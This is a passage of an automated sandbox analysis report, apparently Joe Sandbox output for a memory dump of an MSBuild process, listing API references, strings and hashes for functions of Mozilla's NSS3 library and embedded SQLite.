Part of subcall function 6CBBA0A0: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6CB8A5DF,?,00000000,6CB628AD,00000000,?,6CB8A5DF,?,object), ref: 6CBBA0C0
Part of subcall function 6CBBA0A0: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6CB8A5DF,?,00000000,6CB628AD,00000000,?,6CB8A5DF,?,object), ref: 6CBBA0E8

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CBB2834
memcmp.VCRUNTIME140(00000000,00000020,00000020,?,?,?,?,?,?,?,?), ref: 6CBB284B
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CBB2A98
memcmp.VCRUNTIME140(00000000,?,00000020,?,?,?,?,?,?,?,?,?,?), ref: 6CBB2AAF
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CBB2BDC
memcmp.VCRUNTIME140(00000000,?,00000010,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CBB2BF3
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CBB2D23
memcmp.VCRUNTIME140(00000000,?,00000010,?,?,?,?,?,?,?,?,?), ref: 6CBB2D34

Strings

manufacturer, xrefs: 6CBB285E
model, xrefs: 6CBB2C06
, xrefs: 6CBB2A8E, 6CBB2AAB
token, xrefs: 6CBB25FA
serial, xrefs: 6CBB2AC2

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: memcmpstrlen$strcmp
String ID: $manufacturer$model$serial$token
API String ID: 2407968032-2628435027
Opcode ID: 29984aa2d8455a005697a57f5c56cfd0d7a878b62917d91511dade39c50327b3
Instruction ID: 171a52a3e8b1d38c523c710febdd6b0d75b34eb49cdae8fb077c6b06271b29dc
Opcode Fuzzy Hash: 29984aa2d8455a005697a57f5c56cfd0d7a878b62917d91511dade39c50327b3
Instruction Fuzzy Hash: 3502CDA1E0C7C96EF7318762C88DBF12AA0DB0531CF4D11F5D9496BA93CABC09499353

Function 6CBB4E60 Relevance: 19.7, APIs: 13, Instructions: 186COMMON

Download Yara Rule

APIs

PR_SetErrorText.NSS3(00000000,00000000,?,6CB778F8), ref: 6CBB4E6D

Part of subcall function 6CB509E0: TlsGetValue.KERNEL32(00000000,?,?,?,6CB506A2,00000000,?), ref: 6CB509F8
Part of subcall function 6CB509E0: malloc.MOZGLUE(0000001F), ref: 6CB50A18
Part of subcall function 6CB509E0: memcpy.VCRUNTIME140(?,?,00000001), ref: 6CB50A33

PR_SetError.NSS3(FFFFE09A,00000000,?,?,?,6CB778F8), ref: 6CBB4ED9

Part of subcall function 6CBA5920: NSSUTIL_ArgHasFlag.NSS3(flags,printPolicyFeedback,?,?,?,?,?,?,00000000,?,00000000,?,6CBA7703,?,00000000,00000000), ref: 6CBA5942
Part of subcall function 6CBA5920: NSSUTIL_ArgHasFlag.NSS3(flags,policyCheckIdentifier,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6CBA7703), ref: 6CBA5954
Part of subcall function 6CBA5920: NSSUTIL_ArgHasFlag.NSS3(flags,policyCheckValue,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6CBA596A
Part of subcall function 6CBA5920: SECOID_Init.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6CBA5984
Part of subcall function 6CBA5920: NSSUTIL_ArgGetParamValue.NSS3(disallow,00000000), ref: 6CBA5999
Part of subcall function 6CBA5920: free.MOZGLUE(00000000), ref: 6CBA59BA
Part of subcall function 6CBA5920: NSSUTIL_ArgGetParamValue.NSS3(allow,00000000), ref: 6CBA59D3
Part of subcall function 6CBA5920: free.MOZGLUE(00000000), ref: 6CBA59F5
Part of subcall function 6CBA5920: NSSUTIL_ArgGetParamValue.NSS3(disable,00000000), ref: 6CBA5A0A
Part of subcall function 6CBA5920: free.MOZGLUE(00000000), ref: 6CBA5A2E
Part of subcall function 6CBA5920: NSSUTIL_ArgGetParamValue.NSS3(enable,00000000), ref: 6CBA5A43

SECMOD_FindModule.NSS3(?,?,?,?,?,?,?,?,?,6CB778F8), ref: 6CBB4EB3

Part of subcall function 6CBB4820: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6CBB4EB8,?,?,?,?,?,?,?,?,?,?,6CB778F8), ref: 6CBB484C
Part of subcall function 6CBB4820: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6CBB4EB8,?,?,?,?,?,?,?,?,?,?,6CB778F8), ref: 6CBB486D
Part of subcall function 6CBB4820: PR_SetError.NSS3(FFFFE09A,00000000,00000000,-00000001,00000000,?,6CBB4EB8,?), ref: 6CBB4884

SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?,?,?,6CB778F8), ref: 6CBB4EC0

Part of subcall function 6CBB4470: TlsGetValue.KERNEL32(00000000,?,6CB77296,00000000), ref: 6CBB4487
Part of subcall function 6CBB4470: EnterCriticalSection.KERNEL32(?,?,?,6CB77296,00000000), ref: 6CBB44A0
Part of subcall function 6CBB4470: PR_Unlock.NSS3(?,?,?,?,6CB77296,00000000), ref: 6CBB44BB

TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,6CB778F8), ref: 6CBB4F16
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6CB778F8), ref: 6CBB4F2E
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,6CB778F8), ref: 6CBB4F40
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6CB778F8), ref: 6CBB4F6C
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6CB778F8), ref: 6CBB4F80
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6CB778F8), ref: 6CBB4F8F
PK11_UpdateSlotAttribute.NSS3(?,6CC8DCB0,00000000), ref: 6CBB4FFE
PK11_UserDisableSlot.NSS3(0000001E), ref: 6CBB501F
SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?,?,6CB778F8), ref: 6CBB506B

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: Value$Param$CriticalEnterErrorFlagModuleSectionUnlockfree$DestroyK11_Slotstrcmp$AttributeDisableFindInitTextUpdateUsermallocmemcpy
String ID:
API String ID: 560490210-0
Opcode ID: 5344d9f1fce4151ed1962a3a5982de98ddb871beece496c6819d6d9ee24d6cfc
Instruction ID: 5cdf13fda42bdf36738350c6ae4c3b2a80eef6ea15db43b0681019b6fd5a88e1
Opcode Fuzzy Hash: 5344d9f1fce4151ed1962a3a5982de98ddb871beece496c6819d6d9ee24d6cfc
Instruction Fuzzy Hash: 1A51C4B1D006859BDB119F24EC41ABE77B4FF0531DF140535E80AA6A11FF31D669CA93

Function 6CB5ACC0 Relevance: 19.6, APIs: 13, Instructions: 150stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CB5ACE2
malloc.MOZGLUE(00000001), ref: 6CB5ACEC
strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6CB5AD02
TlsGetValue.KERNEL32 ref: 6CB5AD3C
calloc.MOZGLUE(00000001,?), ref: 6CB5AD8C
PR_Unlock.NSS3 ref: 6CB5ADC0
free.MOZGLUE(00000000), ref: 6CB5AE48
PR_SetError.NSS3(FFFFE890,00000000), ref: 6CB5AE58
free.MOZGLUE(00000000), ref: 6CB5AE69
free.MOZGLUE(?), ref: 6CB5AE78
PR_Unlock.NSS3 ref: 6CB5AE8C
free.MOZGLUE(?), ref: 6CB5AEAB
memcpy.VCRUNTIME140(00000000,?,?), ref: 6CB5AEC7

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: free$Unlock$ErrorValuecallocmallocmemcpystrcpystrlen
String ID:
API String ID: 786543732-0
Opcode ID: 1b02c8f77c7d096de7c21df3c3ba4c30cd1f4ace9e14fbc4ce6a839702a47eed
Instruction ID: b88c5b0632a68b8e3ae01edac5d4ebef12bdea57ebdcf3a321ddf6e2644a2e94
Opcode Fuzzy Hash: 1b02c8f77c7d096de7c21df3c3ba4c30cd1f4ace9e14fbc4ce6a839702a47eed
Instruction Fuzzy Hash: 66518BB1A012668BDB00EF99DC416BE77B4FB06349F640125D805B7B50E331EA65CFE6

Function 6CB9ADC0 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 110COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_MessageSignInit), ref: 6CB9ADE6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CB9AE17
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CB9AE29

Part of subcall function 6CC7D930: PL_strncpyz.NSS3(?,?,?), ref: 6CC7D963

PR_LogPrint.NSS3(?,00000000), ref: 6CB9AE3F
PL_strncpyz.NSS3(?, hKey = 0x%x,00000050), ref: 6CB9AE78
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CB9AE8A
PR_LogPrint.NSS3(?,00000000), ref: 6CB9AEA0

Strings

(CK_INVALID_HANDLE), xrefs: 6CB9AE1F, 6CB9AE80
hKey = 0x%x, xrefs: 6CB9AE62, 6CB9AE72
hSession = 0x%x, xrefs: 6CB9AE01, 6CB9AE11
C_MessageSignInit, xrefs: 6CB9ADE1

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: L_strncpyzPrint$L_strcatn
String ID: hKey = 0x%x$ hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageSignInit
API String ID: 332880674-605059067
Opcode ID: 5c862c5aac7abf2ff49db6851be1eec0e4341c9f5f15d9ff4bbcd82455e46229
Instruction ID: 99f8abf8b3b773173d611679a5182a34b42d33635c5ac1965eca2b72709c11d7
Opcode Fuzzy Hash: 5c862c5aac7abf2ff49db6851be1eec0e4341c9f5f15d9ff4bbcd82455e46229
Instruction Fuzzy Hash: D531E571A01284ABCB109F14DC98FAF3BB5EB4731DF454435E409ABA51EB309949CFA2

Function 6CC34C40 Relevance: 19.3, APIs: 3, Strings: 8, Instructions: 97COMMON

Download Yara Rule

APIs

sqlite3_value_text16.NSS3(?), ref: 6CC34CAF
sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6CC34CFD
sqlite3_value_text16.NSS3(?), ref: 6CC34D44

Strings

API call with %s database connection pointer, xrefs: 6CC34CF6
another row available, xrefs: 6CC34D20
out of memory, xrefs: 6CC34C78, 6CC34C9E
bad parameter or other API misuse, xrefs: 6CC34D05
invalid, xrefs: 6CC34CF1
abort due to ROLLBACK, xrefs: 6CC34D27, 6CC34D33
no more rows available, xrefs: 6CC34D2E
unknown error, xrefs: 6CC34D56

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: sqlite3_value_text16$sqlite3_log
String ID: API call with %s database connection pointer$abort due to ROLLBACK$another row available$bad parameter or other API misuse$invalid$no more rows available$out of memory$unknown error
API String ID: 2274617401-4033235608
Opcode ID: f5c23d6fd6928fbe84a885a1e3b29bfb9be3762a98bbe266df3b3aa5e4954821
Instruction ID: bb3d64af9d0684bbc7439271a0660423a79ed2db4bf4240aef18da7155cad124
Opcode Fuzzy Hash: f5c23d6fd6928fbe84a885a1e3b29bfb9be3762a98bbe266df3b3aa5e4954821
Instruction Fuzzy Hash: A4314572E04971ABD705CB25F8017A57F32B7C2358F192169D82C4BE54F723A85287E2

Function 6CB92DD0 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 94COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_InitPIN), ref: 6CB92DF6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CB92E24
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CB92E33

Part of subcall function 6CC7D930: PL_strncpyz.NSS3(?,?,?), ref: 6CC7D963

PR_LogPrint.NSS3(?,00000000), ref: 6CB92E49
PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6CB92E68
PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6CB92E81

Strings

(CK_INVALID_HANDLE), xrefs: 6CB92E2C
pPin = 0x%p, xrefs: 6CB92E63
C_InitPIN, xrefs: 6CB92DF1
ulPinLen = %d, xrefs: 6CB92E7C
hSession = 0x%x, xrefs: 6CB92E0E, 6CB92E1E

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pPin = 0x%p$ ulPinLen = %d$ (CK_INVALID_HANDLE)$C_InitPIN
API String ID: 1003633598-1777813432
Opcode ID: f6c4bf03adc3af8b8fe45a6d075f861e1d31b9709eb037cd1f246f3563070ac3
Instruction ID: f622eb9a7084df6ae2c4e09a52afcd9174b077e32a1d1f56ae70496830fb53ac
Opcode Fuzzy Hash: f6c4bf03adc3af8b8fe45a6d075f861e1d31b9709eb037cd1f246f3563070ac3
Instruction Fuzzy Hash: B831DFB5A01194ABDB109B15DC9CB9B3BB5EB4331DF094035E809A7B51EB309E49CBA2

Function 6CB96EF0 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 94COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_DigestUpdate), ref: 6CB96F16
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CB96F44
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CB96F53

Part of subcall function 6CC7D930: PL_strncpyz.NSS3(?,?,?), ref: 6CC7D963

PR_LogPrint.NSS3(?,00000000), ref: 6CB96F69
PR_LogPrint.NSS3( pPart = 0x%p,?), ref: 6CB96F88
PR_LogPrint.NSS3( ulPartLen = %d,?), ref: 6CB96FA1

Strings

(CK_INVALID_HANDLE), xrefs: 6CB96F4C
ulPartLen = %d, xrefs: 6CB96F9C
C_DigestUpdate, xrefs: 6CB96F11
pPart = 0x%p, xrefs: 6CB96F83
hSession = 0x%x, xrefs: 6CB96F2E, 6CB96F3E

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pPart = 0x%p$ ulPartLen = %d$ (CK_INVALID_HANDLE)$C_DigestUpdate
API String ID: 1003633598-226530419
Opcode ID: c9c9d333dcb40c335e690bdfa397c4836ec77acac94eaa37fa6484251d23c988
Instruction ID: fc832b515ca84b962b0a8f257a0027b2be50c73b1670bbca2898264d5a2176f9
Opcode Fuzzy Hash: c9c9d333dcb40c335e690bdfa397c4836ec77acac94eaa37fa6484251d23c988
Instruction Fuzzy Hash: B831D174601194AFDF509B24DC98B9A3BB5EB4331DF494035E809E7A11EB31DE48CBE2

Function 6CB02450 Relevance: 19.2, APIs: 15, Instructions: 440COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 6CB024BA
LeaveCriticalSection.KERNEL32(?), ref: 6CB0250D
EnterCriticalSection.KERNEL32(?), ref: 6CB02554
LeaveCriticalSection.KERNEL32(?), ref: 6CB025A7
EnterCriticalSection.KERNEL32(?), ref: 6CB02609
LeaveCriticalSection.KERNEL32(?), ref: 6CB0265F
EnterCriticalSection.KERNEL32(?), ref: 6CB026A2
LeaveCriticalSection.KERNEL32(?), ref: 6CB026F5
EnterCriticalSection.KERNEL32(?), ref: 6CB02764
LeaveCriticalSection.KERNEL32(?), ref: 6CB02898
EnterCriticalSection.KERNEL32(?), ref: 6CB028D0
EnterCriticalSection.KERNEL32(?), ref: 6CB02948
LeaveCriticalSection.KERNEL32(?), ref: 6CB0299B
EnterCriticalSection.KERNEL32(?), ref: 6CB029E2
LeaveCriticalSection.KERNEL32(?), ref: 6CB02A31

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: CriticalSection$Enter$Leave
String ID:
API String ID: 2801635615-0
Opcode ID: 2a13988a5b6026ac8b05ac6c941cb867a8edd4ece1e81e2016b2dc7243a0c91b
Instruction ID: 02713d3cd2720ebd428c26029278a18525f8e2cc79e8535413b92abf2159901d
Opcode Fuzzy Hash: 2a13988a5b6026ac8b05ac6c941cb867a8edd4ece1e81e2016b2dc7243a0c91b
Instruction Fuzzy Hash: 9FF1BE31B012508FDB08DFA5E99DA7A3B30FF47716B18016DD80657A00DB39AA4BDB97

Function 6CC32D40 Relevance: 18.2, APIs: 12, Instructions: 187COMMON

Download Yara Rule

APIs

sqlite3_initialize.NSS3 ref: 6CC32D9F

Part of subcall function 6CAECA30: EnterCriticalSection.KERNEL32(?,?,?,6CB4F9C9,?,6CB4F4DA,6CB4F9C9,?,?,6CB1369A), ref: 6CAECA7A
Part of subcall function 6CAECA30: LeaveCriticalSection.KERNEL32(?), ref: 6CAECB26

sqlite3_exec.NSS3(?,?,6CC32F70,?,?), ref: 6CC32DF9
sqlite3_free.NSS3(00000000), ref: 6CC32E2C
sqlite3_free.NSS3(?), ref: 6CC32E3A
sqlite3_free.NSS3(?), ref: 6CC32E52
sqlite3_mprintf.NSS3(6CC9AAF9,?), ref: 6CC32E62
sqlite3_free.NSS3(?), ref: 6CC32E70
sqlite3_free.NSS3(?), ref: 6CC32E89
sqlite3_free.NSS3(?), ref: 6CC32EBB
sqlite3_free.NSS3(?), ref: 6CC32ECB
sqlite3_free.NSS3(00000000), ref: 6CC32F3E
sqlite3_free.NSS3(?), ref: 6CC32F4C

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: sqlite3_free$CriticalSection$EnterLeavesqlite3_execsqlite3_initializesqlite3_mprintf
String ID:
API String ID: 1957633107-0
Opcode ID: b91c15aefe11137b0546ebf29b15ca1540b9f7919bb3cf9e84e0922c330d7e20
Instruction ID: 63bb9226fdfc655f085622f4487d25b42172695bc454d940a7ab7d4e9f0b615f
Opcode Fuzzy Hash: b91c15aefe11137b0546ebf29b15ca1540b9f7919bb3cf9e84e0922c330d7e20
Instruction Fuzzy Hash: 64618DB5E002258BEF01CF69E895BDEB7B1AF48348F145024DD59A7742E731E849CBE1

Function 6CB82C40 Relevance: 18.2, APIs: 12, Instructions: 163COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(6CB83F23,?,6CB7E477,?,?,?,00000001,00000000,?,?,6CB83F23,?), ref: 6CB82C62
EnterCriticalSection.KERNEL32(0000001C,?,6CB7E477,?,?,?,00000001,00000000,?,?,6CB83F23,?), ref: 6CB82C76
PL_HashTableLookup.NSS3(00000000,?,?,6CB7E477,?,?,?,00000001,00000000,?,?,6CB83F23,?), ref: 6CB82C86
PR_Unlock.NSS3(00000000,?,?,?,?,6CB7E477,?,?,?,00000001,00000000,?,?,6CB83F23,?), ref: 6CB82C93

Part of subcall function 6CC0DD70: TlsGetValue.KERNEL32 ref: 6CC0DD8C
Part of subcall function 6CC0DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CC0DDB4

TlsGetValue.KERNEL32(?,?,?,?,?,6CB7E477,?,?,?,00000001,00000000,?,?,6CB83F23,?), ref: 6CB82CC6
EnterCriticalSection.KERNEL32(0000001C,?,?,?,?,?,6CB7E477,?,?,?,00000001,00000000,?,?,6CB83F23,?), ref: 6CB82CDA
PL_HashTableLookup.NSS3(00000000,?,?,?,?,?,?,6CB7E477,?,?,?,00000001,00000000,?,?,6CB83F23), ref: 6CB82CEA
PR_Unlock.NSS3(00000000,?,?,?,?,?,?,?,6CB7E477,?,?,?,00000001,00000000,?), ref: 6CB82CF7
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,6CB7E477,?,?,?,00000001,00000000,?), ref: 6CB82D4D
EnterCriticalSection.KERNEL32(?), ref: 6CB82D61
PL_HashTableLookup.NSS3(?,?), ref: 6CB82D71
PR_Unlock.NSS3(?), ref: 6CB82D7E

Part of subcall function 6CB507A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6CAE204A), ref: 6CB507AD
Part of subcall function 6CB507A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CAE204A), ref: 6CB507CD
Part of subcall function 6CB507A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CAE204A), ref: 6CB507D6
Part of subcall function 6CB507A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6CAE204A), ref: 6CB507E4
Part of subcall function 6CB507A0: TlsSetValue.KERNEL32(00000000,?,6CAE204A), ref: 6CB50864
Part of subcall function 6CB507A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CB50880
Part of subcall function 6CB507A0: TlsSetValue.KERNEL32(00000000,?,?,6CAE204A), ref: 6CB508CB
Part of subcall function 6CB507A0: TlsGetValue.KERNEL32(?,?,6CAE204A), ref: 6CB508D7
Part of subcall function 6CB507A0: TlsGetValue.KERNEL32(?,?,6CAE204A), ref: 6CB508FB

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: Value$CriticalSection$EnterHashLookupTableUnlock$calloc$Leave
String ID:
API String ID: 2446853827-0
Opcode ID: 125c626005922d1cd2f46254b95d45946696f80fc11f48b758138bed46f3ce47
Instruction ID: f96c7fdaac14f467c7055cc44095a98379ab99fe37fdd1a3e432aa65982305a3
Opcode Fuzzy Hash: 125c626005922d1cd2f46254b95d45946696f80fc11f48b758138bed46f3ce47
Instruction Fuzzy Hash: 5751E5B6D01255AFEB009F24DC458AA7B78FF1525CF048520EC1997B12F731E964CBE2

Function 6CAE4C70 Relevance: 18.1, APIs: 12, Instructions: 116threadCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,6CAE3921,6CCC14E4,6CC2CC70), ref: 6CAE4C97
